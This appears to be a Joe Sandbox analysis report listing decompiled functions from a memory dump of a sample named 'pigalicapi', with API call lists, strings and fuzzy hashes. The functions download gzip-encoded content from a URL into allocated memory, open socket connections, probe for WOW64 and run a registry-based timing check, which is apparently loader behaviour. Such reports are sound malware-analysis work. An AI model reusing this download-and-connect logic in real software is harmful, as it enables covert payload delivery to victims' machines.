                                                                                                                                                                                                                                                                            				if( *0x7c3b80 == 0 || _a4 == 0 || _a8 == 0 || _a12 == 0) {
                                                                                                                                                                                                                                                                            					L25:
                                                                                                                                                                                                                                                                            					return _v8;
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					memcpy( &_v84, "Accept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip, deflate\r\n", 0x10 << 2);
                                                                                                                                                                                                                                                                            					asm("movsw");
                                                                                                                                                                                                                                                                            					asm("movsb");
                                                                                                                                                                                                                                                                            					_v92 = 0x80000200;
                                                                                                                                                                                                                                                                            					if((_a16 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                            						_v92 = _v92 | 0x00803000;
                                                                                                                                                                                                                                                                            						_v96 = 4;
                                                                                                                                                                                                                                                                            						_t139 =  *0x7c3b80; // 0x0
                                                                                                                                                                                                                                                                            						InternetQueryOptionA(_t139, 0x1f,  &_v100,  &_v96);
                                                                                                                                                                                                                                                                            						_v100 = _v100 | 0x00000100;
                                                                                                                                                                                                                                                                            						_t140 =  *0x7c3b80; // 0x0
                                                                                                                                                                                                                                                                            						InternetSetOptionA(_t140, 0x1f,  &_v100, 4);
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_t142 =  *0x7c3b80; // 0x0
                                                                                                                                                                                                                                                                            					_v88 = InternetOpenUrlA(_t142, _a4,  &_v84, 0x42, _v92, 0);
                                                                                                                                                                                                                                                                            					if(_v88 == 0) {
                                                                                                                                                                                                                                                                            						_v660 = GetLastError();
                                                                                                                                                                                                                                                                            						goto L25;
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            						_v360 = 0x100;
                                                                                                                                                                                                                                                                            						E007B7D20( &_v356,  &_v356, 0, 0x100);
                                                                                                                                                                                                                                                                            						_v364 = 0;
                                                                                                                                                                                                                                                                            						if(HttpQueryInfoA(_v88, 0x13,  &_v356,  &_v360,  &_v364) == 0) {
                                                                                                                                                                                                                                                                            							L23:
                                                                                                                                                                                                                                                                            							InternetCloseHandle(_v88);
                                                                                                                                                                                                                                                                            							goto L25;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_v368 = E007B7DD0( &_v356);
                                                                                                                                                                                                                                                                            						if(_v368 != 0xc8) {
                                                                                                                                                                                                                                                                            							goto L23;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_v372 = VirtualAlloc(0, _a12, 0x3000, 4);
                                                                                                                                                                                                                                                                            						if(_v372 == 0) {
                                                                                                                                                                                                                                                                            							goto L23;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_v388 = 0;
                                                                                                                                                                                                                                                                            						_v376 = 0;
                                                                                                                                                                                                                                                                            						_v380 = _v372;
                                                                                                                                                                                                                                                                            						while(1) {
                                                                                                                                                                                                                                                                            							InternetReadFile(_v88, _v380, _a12,  &_v376);
                                                                                                                                                                                                                                                                            							if(_v376 == 0) {
                                                                                                                                                                                                                                                                            								break;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							_v388 = _v388 + _v376;
                                                                                                                                                                                                                                                                            							_v380 = _v380 + _v376;
                                                                                                                                                                                                                                                                            							_t149 = _a12 - _v376;
                                                                                                                                                                                                                                                                            							_a12 = _t149;
                                                                                                                                                                                                                                                                            							if(_t149 >= 0) {
                                                                                                                                                                                                                                                                            								continue;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							L16:
                                                                                                                                                                                                                                                                            							_v8 = _v388;
                                                                                                                                                                                                                                                                            							_v396 = _v372;
                                                                                                                                                                                                                                                                            							_v392 = 0x100;
                                                                                                                                                                                                                                                                            							E007B7D20(_v388,  &_v652, 0, 0x100);
                                                                                                                                                                                                                                                                            							_v381 = 0;
                                                                                                                                                                                                                                                                            							if(HttpQueryInfoA(_v88, 0x1d,  &_v652,  &_v392,  &_v364) != 0 && lstrcmpiA( &_v652, "gzip") == 0) {
                                                                                                                                                                                                                                                                            								_v656 = E007B2E00(_v388, _v372, _v388, _a8, _a12);
                                                                                                                                                                                                                                                                            								if(_v656 > 0) {
                                                                                                                                                                                                                                                                            									_v8 = _v656;
                                                                                                                                                                                                                                                                            									_v396 = _a8;
                                                                                                                                                                                                                                                                            									_v381 = 1;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							if((_v381 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                            								E007B7B70(_a8, _v372, _v8);
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							VirtualFree(_v372, 0, 0x8000);
                                                                                                                                                                                                                                                                            							goto L23;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						goto L16;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            			}



























                                                                                                                                                                                                                                                                            0x007b2afb
                                                                                                                                                                                                                                                                            0x007b2b09
                                                                                                                                                                                                                                                                            0x007b2df2
                                                                                                                                                                                                                                                                            0x007b2dfa
                                                                                                                                                                                                                                                                            0x007b2b2d
                                                                                                                                                                                                                                                                            0x007b2b3a
                                                                                                                                                                                                                                                                            0x007b2b3c
                                                                                                                                                                                                                                                                            0x007b2b3e
                                                                                                                                                                                                                                                                            0x007b2b3f
                                                                                                                                                                                                                                                                            0x007b2b4c
                                                                                                                                                                                                                                                                            0x007b2b57
                                                                                                                                                                                                                                                                            0x007b2b5a
                                                                                                                                                                                                                                                                            0x007b2b6b
                                                                                                                                                                                                                                                                            0x007b2b72
                                                                                                                                                                                                                                                                            0x007b2b81
                                                                                                                                                                                                                                                                            0x007b2b8c
                                                                                                                                                                                                                                                                            0x007b2b93
                                                                                                                                                                                                                                                                            0x007b2b93
                                                                                                                                                                                                                                                                            0x007b2ba9
                                                                                                                                                                                                                                                                            0x007b2bb6
                                                                                                                                                                                                                                                                            0x007b2bbd
                                                                                                                                                                                                                                                                            0x007b2de0
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b2bc3
                                                                                                                                                                                                                                                                            0x007b2bc3
                                                                                                                                                                                                                                                                            0x007b2bdb
                                                                                                                                                                                                                                                                            0x007b2be3
                                                                                                                                                                                                                                                                            0x007b2c10
                                                                                                                                                                                                                                                                            0x007b2dce
                                                                                                                                                                                                                                                                            0x007b2dd2
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b2dd2
                                                                                                                                                                                                                                                                            0x007b2c25
                                                                                                                                                                                                                                                                            0x007b2c35
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b2c4e
                                                                                                                                                                                                                                                                            0x007b2c5b
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b2c61
                                                                                                                                                                                                                                                                            0x007b2c6b
                                                                                                                                                                                                                                                                            0x007b2c7b
                                                                                                                                                                                                                                                                            0x007b2c81
                                                                                                                                                                                                                                                                            0x007b2c97
                                                                                                                                                                                                                                                                            0x007b2ca4
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b2cb4
                                                                                                                                                                                                                                                                            0x007b2cc6
                                                                                                                                                                                                                                                                            0x007b2ccf
                                                                                                                                                                                                                                                                            0x007b2cd5
                                                                                                                                                                                                                                                                            0x007b2cd8
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b2cdc
                                                                                                                                                                                                                                                                            0x007b2cde
                                                                                                                                                                                                                                                                            0x007b2ce4
                                                                                                                                                                                                                                                                            0x007b2ced
                                                                                                                                                                                                                                                                            0x007b2cf3
                                                                                                                                                                                                                                                                            0x007b2d0b
                                                                                                                                                                                                                                                                            0x007b2d13
                                                                                                                                                                                                                                                                            0x007b2d3d
                                                                                                                                                                                                                                                                            0x007b2d70
                                                                                                                                                                                                                                                                            0x007b2d7d
                                                                                                                                                                                                                                                                            0x007b2d85
                                                                                                                                                                                                                                                                            0x007b2d8b
                                                                                                                                                                                                                                                                            0x007b2d91
                                                                                                                                                                                                                                                                            0x007b2d91
                                                                                                                                                                                                                                                                            0x007b2d7d
                                                                                                                                                                                                                                                                            0x007b2da1
                                                                                                                                                                                                                                                                            0x007b2db2
                                                                                                                                                                                                                                                                            0x007b2db7
                                                                                                                                                                                                                                                                            0x007b2dc8
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b2dc8
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b2ca6
                                                                                                                                                                                                                                                                            0x007b2bbd

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • InternetQueryOptionA.WININET(00000000,0000001F,?,00000004), ref: 007B2B72
                                                                                                                                                                                                                                                                            • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 007B2B93
                                                                                                                                                                                                                                                                            • InternetOpenUrlA.WININET(00000000,00000000,?,00000042,80000200,00000000), ref: 007B2BB0
                                                                                                                                                                                                                                                                            • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 007B2C08
                                                                                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 007B2C48
                                                                                                                                                                                                                                                                            • InternetReadFile.WININET(00000000,?,00000000,00000000), ref: 007B2C97
                                                                                                                                                                                                                                                                            • HttpQueryInfoA.WININET(00000000,0000001D,?,00000100,00000000), ref: 007B2D35
                                                                                                                                                                                                                                                                            • lstrcmpiA.KERNEL32(?,gzip), ref: 007B2D4B
                                                                                                                                                                                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 007B2DC8
                                                                                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 007B2DD2
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 007B2DDA
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • gzip, xrefs: 007B2D3F
                                                                                                                                                                                                                                                                            • Accept: */*Accept-Language: enAccept-Encoding: gzip, deflate, xrefs: 007B2B32
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.812221032.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7b0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Internet$Query$HttpInfoOptionVirtual$AllocCloseErrorFileFreeHandleLastOpenReadlstrcmpi
                                                                                                                                                                                                                                                                            • String ID: Accept: */*Accept-Language: enAccept-Encoding: gzip, deflate$gzip
                                                                                                                                                                                                                                                                            • API String ID: 2564233093-2863726208
                                                                                                                                                                                                                                                                            • Opcode ID: 09cba39a7b55e473e9a744d4c74246ad2ce22f6e3c51308fedcb9e3b6d73330a
                                                                                                                                                                                                                                                                            • Instruction ID: 1f7f9d52a774fb8e074630fdbb5267ce581f60a1b04a222e6a51813011b7319b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 09cba39a7b55e473e9a744d4c74246ad2ce22f6e3c51308fedcb9e3b6d73330a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3D911BB1A0421CEBDB25CF94CC48BEEB7B9BB48300F508599F509AB281DB795E85CF54
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 53%
                                                                                                                                                                                                                                                                            			E007BA090(signed int __eax, intOrPtr _a4, signed short _a8, intOrPtr _a12, char _a16) {
                                                                                                                                                                                                                                                                            				signed char _v8;
                                                                                                                                                                                                                                                                            				short _v12;
                                                                                                                                                                                                                                                                            				signed char _v13;
                                                                                                                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                                                                                                                            				intOrPtr _v32;
                                                                                                                                                                                                                                                                            				short _v34;
                                                                                                                                                                                                                                                                            				char _v36;
                                                                                                                                                                                                                                                                            				intOrPtr _v40;
                                                                                                                                                                                                                                                                            				char _v44;
                                                                                                                                                                                                                                                                            				signed int _t40;
                                                                                                                                                                                                                                                                            				char* _t42;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_push(6);
                                                                                                                                                                                                                                                                            				_push(1);
                                                                                                                                                                                                                                                                            				_push(2);
                                                                                                                                                                                                                                                                            				L007BB210();
                                                                                                                                                                                                                                                                            				_v20 = __eax;
                                                                                                                                                                                                                                                                            				if(_v20 != 0xffffffff) {
                                                                                                                                                                                                                                                                            					_v36 = 2;
                                                                                                                                                                                                                                                                            					_push(_a8 & 0x0000ffff);
                                                                                                                                                                                                                                                                            					L007BB20A();
                                                                                                                                                                                                                                                                            					_v34 = 2;
                                                                                                                                                                                                                                                                            					_push(_a4);
                                                                                                                                                                                                                                                                            					L007BB204();
                                                                                                                                                                                                                                                                            					_v12 = 2;
                                                                                                                                                                                                                                                                            					if(_v12 == 0) {
                                                                                                                                                                                                                                                                            						return 0xffffffffffffffff;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_v32 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v12 + 0xc))))));
                                                                                                                                                                                                                                                                            					_v8 = 0;
                                                                                                                                                                                                                                                                            					_v13 = 0;
                                                                                                                                                                                                                                                                            					_v40 = 0;
                                                                                                                                                                                                                                                                            					while(_v40 < _a12) {
                                                                                                                                                                                                                                                                            						_push(0x10);
                                                                                                                                                                                                                                                                            						_t42 =  &_v36;
                                                                                                                                                                                                                                                                            						_push(_t42);
                                                                                                                                                                                                                                                                            						_push(_v20);
                                                                                                                                                                                                                                                                            						L007BB1FE();
                                                                                                                                                                                                                                                                            						if(_t42 != 0) {
                                                                                                                                                                                                                                                                            							_v40 = _v40 + 1;
                                                                                                                                                                                                                                                                            							continue;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_v13 = 1;
                                                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					if((_v13 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                            						if(_a16 != 0) {
                                                                                                                                                                                                                                                                            							_v44 = _a16;
                                                                                                                                                                                                                                                                            							_push(4);
                                                                                                                                                                                                                                                                            							_push( &_v44);
                                                                                                                                                                                                                                                                            							_push(0x1005);
                                                                                                                                                                                                                                                                            							_push(0xffff);
                                                                                                                                                                                                                                                                            							_push(_v20);
                                                                                                                                                                                                                                                                            							L007BB1F2();
                                                                                                                                                                                                                                                                            							_push(4);
                                                                                                                                                                                                                                                                            							_push( &_v44);
                                                                                                                                                                                                                                                                            							_push(0x1006);
                                                                                                                                                                                                                                                                            							_push(0xffff);
                                                                                                                                                                                                                                                                            							_push(_v20);
                                                                                                                                                                                                                                                                            							L007BB1F2();
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						return _v20;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_t40 = _v20;
                                                                                                                                                                                                                                                                            					_push(_t40);
                                                                                                                                                                                                                                                                            					L007BB1F8();
                                                                                                                                                                                                                                                                            					return _t40 | 0xffffffff;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return _v20;
                                                                                                                                                                                                                                                                            			}














                                                                                                                                                                                                                                                                            0x007ba096
                                                                                                                                                                                                                                                                            0x007ba098
                                                                                                                                                                                                                                                                            0x007ba09a
                                                                                                                                                                                                                                                                            0x007ba09c
                                                                                                                                                                                                                                                                            0x007ba0a1
                                                                                                                                                                                                                                                                            0x007ba0a8
                                                                                                                                                                                                                                                                            0x007ba0b7
                                                                                                                                                                                                                                                                            0x007ba0bf
                                                                                                                                                                                                                                                                            0x007ba0c0
                                                                                                                                                                                                                                                                            0x007ba0c5
                                                                                                                                                                                                                                                                            0x007ba0cc
                                                                                                                                                                                                                                                                            0x007ba0cd
                                                                                                                                                                                                                                                                            0x007ba0d2
                                                                                                                                                                                                                                                                            0x007ba0d9
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007ba0ea
                                                                                                                                                                                                                                                                            0x007ba0e5
                                                                                                                                                                                                                                                                            0x007ba0f2
                                                                                                                                                                                                                                                                            0x007ba0f9
                                                                                                                                                                                                                                                                            0x007ba0fd
                                                                                                                                                                                                                                                                            0x007ba10f
                                                                                                                                                                                                                                                                            0x007ba117
                                                                                                                                                                                                                                                                            0x007ba119
                                                                                                                                                                                                                                                                            0x007ba11c
                                                                                                                                                                                                                                                                            0x007ba120
                                                                                                                                                                                                                                                                            0x007ba121
                                                                                                                                                                                                                                                                            0x007ba128
                                                                                                                                                                                                                                                                            0x007ba10c
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007ba10c
                                                                                                                                                                                                                                                                            0x007ba12a
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007ba12a
                                                                                                                                                                                                                                                                            0x007ba138
                                                                                                                                                                                                                                                                            0x007ba14c
                                                                                                                                                                                                                                                                            0x007ba151
                                                                                                                                                                                                                                                                            0x007ba154
                                                                                                                                                                                                                                                                            0x007ba159
                                                                                                                                                                                                                                                                            0x007ba15a
                                                                                                                                                                                                                                                                            0x007ba15f
                                                                                                                                                                                                                                                                            0x007ba167
                                                                                                                                                                                                                                                                            0x007ba168
                                                                                                                                                                                                                                                                            0x007ba16d
                                                                                                                                                                                                                                                                            0x007ba172
                                                                                                                                                                                                                                                                            0x007ba173
                                                                                                                                                                                                                                                                            0x007ba178
                                                                                                                                                                                                                                                                            0x007ba180
                                                                                                                                                                                                                                                                            0x007ba181
                                                                                                                                                                                                                                                                            0x007ba181
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007ba186
                                                                                                                                                                                                                                                                            0x007ba13a
                                                                                                                                                                                                                                                                            0x007ba13d
                                                                                                                                                                                                                                                                            0x007ba13e
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007ba143
                                                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • socket.WS2_32(00000002,00000001,00000006), ref: 007BA09C
                                                                                                                                                                                                                                                                            • htons.WS2_32(?), ref: 007BA0C0
                                                                                                                                                                                                                                                                            • gethostbyname.WS2_32(?), ref: 007BA0CD
                                                                                                                                                                                                                                                                            • connect.WS2_32(000000FF,?,00000010), ref: 007BA121
                                                                                                                                                                                                                                                                            • closesocket.WS2_32(000000FF), ref: 007BA13E
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.812221032.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7b0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: closesocketconnectgethostbynamehtonssocket
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 530611402-0
                                                                                                                                                                                                                                                                            • Opcode ID: 747257bfaed683e84bc49f1cdc42f1adb0bebd178f9909ce09bf36877d3dd108
                                                                                                                                                                                                                                                                            • Instruction ID: f9fb5679d0eef04dc1fc38012651d5700268fed78e416a1d3e0205aa0bf819c3
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 747257bfaed683e84bc49f1cdc42f1adb0bebd178f9909ce09bf36877d3dd108
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C531FE70A0021DEBDB14EFA8C855BEEB7B5BF48710F104659F5216B2C0D7B99940DB52
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 68%
                                                                                                                                                                                                                                                                            			E007B9290() {
                                                                                                                                                                                                                                                                            				char _v8;
                                                                                                                                                                                                                                                                            				_Unknown_base(*)()* _v12;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                                                                                                                            				_v12 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "IsWow64Process");
                                                                                                                                                                                                                                                                            				if(_v12 != 0) {
                                                                                                                                                                                                                                                                            					_v12(GetCurrentProcess(),  &_v8);
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return _v8;
                                                                                                                                                                                                                                                                            			}





                                                                                                                                                                                                                                                                            0x007b9296
                                                                                                                                                                                                                                                                            0x007b92b4
                                                                                                                                                                                                                                                                            0x007b92bb
                                                                                                                                                                                                                                                                            0x007b92c8
                                                                                                                                                                                                                                                                            0x007b92c8
                                                                                                                                                                                                                                                                            0x007b92d1

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,IsWow64Process), ref: 007B92A7
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 007B92AE
                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000000), ref: 007B92C1
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.812221032.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7b0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AddressCurrentHandleModuleProcProcess
                                                                                                                                                                                                                                                                            • String ID: IsWow64Process$kernel32.dll
                                                                                                                                                                                                                                                                            • API String ID: 4190356694-3024904723
                                                                                                                                                                                                                                                                            • Opcode ID: 0a84c2362b7e2bb894d52008acde297f678dfe86220db4480c2e57ada29127dc
                                                                                                                                                                                                                                                                            • Instruction ID: bf9e9247fb0b3c31065c6b182a4b518908469a87aadc916427fdcaa1d5c25abe
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0a84c2362b7e2bb894d52008acde297f678dfe86220db4480c2e57ada29127dc
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1DE075B5D00208EBDB01ABF49D4DB9DBB78AB08306F508694E945A2250D6786A448B55
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 85%
                                                                                                                                                                                                                                                                            			E007B7250(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                            				char _v5;
                                                                                                                                                                                                                                                                            				char* _v12;
                                                                                                                                                                                                                                                                            				void* _v16;
                                                                                                                                                                                                                                                                            				void* _v20;
                                                                                                                                                                                                                                                                            				intOrPtr _v24;
                                                                                                                                                                                                                                                                            				char _v40;
                                                                                                                                                                                                                                                                            				int _v44;
                                                                                                                                                                                                                                                                            				int _v48;
                                                                                                                                                                                                                                                                            				char _v64;
                                                                                                                                                                                                                                                                            				signed int _v68;
                                                                                                                                                                                                                                                                            				intOrPtr* _v72;
                                                                                                                                                                                                                                                                            				struct _SYSTEMTIME _v88;
                                                                                                                                                                                                                                                                            				char* _t58;
                                                                                                                                                                                                                                                                            				intOrPtr* _t68;
                                                                                                                                                                                                                                                                            				short* _t69;
                                                                                                                                                                                                                                                                            				signed int _t70;
                                                                                                                                                                                                                                                                            				intOrPtr* _t91;
                                                                                                                                                                                                                                                                            				void* _t97;
                                                                                                                                                                                                                                                                            				void* _t100;
                                                                                                                                                                                                                                                                            				intOrPtr* _t101;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v5 = 1;
                                                                                                                                                                                                                                                                            				if(_a4 == 0 || _a8 == 0 || _a12 == 0 ||  *((intOrPtr*)(_a4 + 0x10)) == 0) {
                                                                                                                                                                                                                                                                            					L12:
                                                                                                                                                                                                                                                                            					return _v5;
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					_v24 = E007B16F0(_a8, _a12);
                                                                                                                                                                                                                                                                            					_t58 =  *0x7c18a0; // 0x7c3b88
                                                                                                                                                                                                                                                                            					_v12 = _t58;
                                                                                                                                                                                                                                                                            					E007B7D20(_t58,  &_v40, 0, 0x10);
                                                                                                                                                                                                                                                                            					wsprintfA( &_v40, "%u", _v24);
                                                                                                                                                                                                                                                                            					_t100 = _t97 + 0x20;
                                                                                                                                                                                                                                                                            					_v16 = 0x80000001;
                                                                                                                                                                                                                                                                            					if(( *0x7c435a & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                            						_v16 = 0x80000002;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_v20 = 0;
                                                                                                                                                                                                                                                                            					if(RegOpenKeyExA(_v16, _v12, 0, 0xf003f,  &_v20) == 0) {
                                                                                                                                                                                                                                                                            						_v48 = 0x10;
                                                                                                                                                                                                                                                                            						_v44 = 0x10;
                                                                                                                                                                                                                                                                            						if(RegQueryValueExA(_v20,  &_v40, 0, 0,  &_v64,  &_v44) == 0 && _v44 == 0x10) {
                                                                                                                                                                                                                                                                            							_v72 =  &_v64;
                                                                                                                                                                                                                                                                            							GetLocalTime( &_v88);
                                                                                                                                                                                                                                                                            							_t91 = _v72;
                                                                                                                                                                                                                                                                            							_t101 = _t100 - 0x10;
                                                                                                                                                                                                                                                                            							_t68 = _t101;
                                                                                                                                                                                                                                                                            							 *_t68 =  *_t91;
                                                                                                                                                                                                                                                                            							 *((intOrPtr*)(_t68 + 4)) =  *((intOrPtr*)(_t91 + 4));
                                                                                                                                                                                                                                                                            							 *((intOrPtr*)(_t68 + 8)) =  *((intOrPtr*)(_t91 + 8));
                                                                                                                                                                                                                                                                            							 *((intOrPtr*)(_t68 + 0xc)) =  *((intOrPtr*)(_t91 + 0xc));
                                                                                                                                                                                                                                                                            							_t69 = _t101 - 0x10;
                                                                                                                                                                                                                                                                            							 *_t69 = _v88.wYear;
                                                                                                                                                                                                                                                                            							_t69[2] = _v88.wDayOfWeek;
                                                                                                                                                                                                                                                                            							_t69[4] = _v88.wHour;
                                                                                                                                                                                                                                                                            							_t69[6] = _v88.wSecond;
                                                                                                                                                                                                                                                                            							_t70 = E007B9910();
                                                                                                                                                                                                                                                                            							asm("cdq");
                                                                                                                                                                                                                                                                            							_v68 = _t70 / 0x3c;
                                                                                                                                                                                                                                                                            							if(_v68 <  *((intOrPtr*)(_a4 + 0x10))) {
                                                                                                                                                                                                                                                                            								_v5 = 0;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						RegCloseKey(_v20);
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					goto L12;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            			}























                                                                                                                                                                                                                                                                            0x007b7256
                                                                                                                                                                                                                                                                            0x007b725e
                                                                                                                                                                                                                                                                            0x007b73af
                                                                                                                                                                                                                                                                            0x007b73b5
                                                                                                                                                                                                                                                                            0x007b7285
                                                                                                                                                                                                                                                                            0x007b7295
                                                                                                                                                                                                                                                                            0x007b7298
                                                                                                                                                                                                                                                                            0x007b729d
                                                                                                                                                                                                                                                                            0x007b72a8
                                                                                                                                                                                                                                                                            0x007b72bd
                                                                                                                                                                                                                                                                            0x007b72c3
                                                                                                                                                                                                                                                                            0x007b72c6
                                                                                                                                                                                                                                                                            0x007b72d6
                                                                                                                                                                                                                                                                            0x007b72d8
                                                                                                                                                                                                                                                                            0x007b72d8
                                                                                                                                                                                                                                                                            0x007b72df
                                                                                                                                                                                                                                                                            0x007b7301
                                                                                                                                                                                                                                                                            0x007b7307
                                                                                                                                                                                                                                                                            0x007b730e
                                                                                                                                                                                                                                                                            0x007b7331
                                                                                                                                                                                                                                                                            0x007b733c
                                                                                                                                                                                                                                                                            0x007b7343
                                                                                                                                                                                                                                                                            0x007b7349
                                                                                                                                                                                                                                                                            0x007b734c
                                                                                                                                                                                                                                                                            0x007b734f
                                                                                                                                                                                                                                                                            0x007b7353
                                                                                                                                                                                                                                                                            0x007b7358
                                                                                                                                                                                                                                                                            0x007b735e
                                                                                                                                                                                                                                                                            0x007b7364
                                                                                                                                                                                                                                                                            0x007b736a
                                                                                                                                                                                                                                                                            0x007b736f
                                                                                                                                                                                                                                                                            0x007b7374
                                                                                                                                                                                                                                                                            0x007b737a
                                                                                                                                                                                                                                                                            0x007b7380
                                                                                                                                                                                                                                                                            0x007b7383
                                                                                                                                                                                                                                                                            0x007b738b
                                                                                                                                                                                                                                                                            0x007b7393
                                                                                                                                                                                                                                                                            0x007b739f
                                                                                                                                                                                                                                                                            0x007b73a1
                                                                                                                                                                                                                                                                            0x007b73a1
                                                                                                                                                                                                                                                                            0x007b739f
                                                                                                                                                                                                                                                                            0x007b73a9
                                                                                                                                                                                                                                                                            0x007b73a9
                                                                                                                                                                                                                                                                            0x00000000
